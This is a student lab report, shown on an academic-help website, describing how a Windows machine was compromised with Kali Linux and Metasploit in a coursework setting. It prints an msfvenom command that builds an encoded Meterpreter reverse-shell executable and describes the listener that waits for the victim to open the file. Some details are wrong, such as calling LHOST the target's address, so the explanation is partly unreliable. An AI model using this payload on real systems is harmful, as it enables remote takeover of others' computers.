PricingBlogAbout Us

Kali Linux Exploit using Metasploit for Windows OS

Verified

Added on  2023/06/04

|4
|852
|443
AI Summary
This article explains how to use Kali Linux and Metasploit to exploit Windows operating system remotely. The article covers the requirements, commands, and steps to execute the exploit. The exploit enables the attacker to get full access to the victim's machine with user rights. The article is relevant to ICT ethical hacking and penetration testing courses.

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.
Document Page
Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.
Document Page
ICT ETHICAL HACKING (EXPLOITS) 2
The exploit we developed during the workshop targeted machines operating under
windows operating systems and we used the metasploit framework to achieve that. The approach
was aimed at enabling us get into the victims machine with full user rights just like it is the case
when the owner physically logs into the system. Metasploit framework is defined as a project
that enables development of ID signatures and penetration testing remotely. The tool enabled us
develop and execute an exploit code against a windows operating system machine which was
operating remotely (Dieterle, 2016).
There were various requirements for us to demonstrate how the exploit could be
achieved. These were: two machines under the same NAT network, two different Windows and
Linux). Each of these Operating systems was installed in the two machines available and a
Metasploit framework containing all the Ruby packages. This framework was then installed on
the machine operating under Kali Linux platform and which would be used as the operating
platform to execute the exploit. Since presence of an operating system in the target machine
could hinder smooth execution of the exploit, we made sure that there was no any antivirus
software running in the target machine before we could launch the penetration tests (Holik,
Horalek, Marik, Neradova & Zitta, 2014, p.240). Out of the many commands which could have
been used to facilitate the exploitation, we chose to use the Msfconsole command because of its
supportive features on the tools under the framework as well as its flexibility. The command
provided us with handy-all- in –one interface in all the framework settings.
To penetrate into the victim’s machine and which was operating under Windows
platform, we only needed to know both the machine IP address and any of its free PORT
number. Considering that the two machines were operating under the same NAT network, to
obtain these two components was easy using Netcut software.
Document Page
ICT ETHICAL HACKING (EXPLOITS) 3
Using the two specifications (IP address and PORT number) we then came up with an
executable folder which contained several .exe files and whose identity keys were the two
components (IP address and PORT number) to be sent to the targeted machine in any channel
which was available. For our case, we sent the files through the NAT network. We created the
executable file using a Msfconsole command “msfvenom –p windows/meterpreter/reverse_tcp
LHOST= (IP address of windows machine) LPORT=(PORT in the windows machine) –f exe –e
x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe” (Pritchett & De Smet, 2013).
Immediately after sending the file through the NAT network, we were entitled set
metasploit platform the state of listening and which operates when the Msfconsole is on the
handler status (Weidman, 2014). The command used at this operation was the “exploit”
command. Under the listening state, Metasploit framework waited until the user of the targeted
machine opened the file which had been sent to activate “meterpreter” option and which enabled
us to get full access into the victim’s machine.
In addition to having gotten into this machine remotely, we had all the user rights just
like a person who had physically logged into the machine. Some of the rights we could enjoy at
that juncture were: changing the directories, uploading files, removing directories, navigating
through the files, deleting files, printing local directories as well as working directories and
reading file contents located at any area of the computer system (Muniz, 2013). The ability to
carry out all the above activities without physically logging into the victims computer was an
indication that we had exploited this machine remotely.
Document Page
ICT ETHICAL HACKING (EXPLOITS) 4
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.
1 out of 4
circle_padding
hide_on_mobile
zoom_out_icon
[object Object]

Your All-in-One AI-Powered Toolkit for Academic Success.

  +13062052269
info@desklib.com

Available 24*7 on WhatsApp / Email

[object Object]
Unlock your academic potential

© 2024   |   Zucol Services PVT LTD   |   All rights reserved.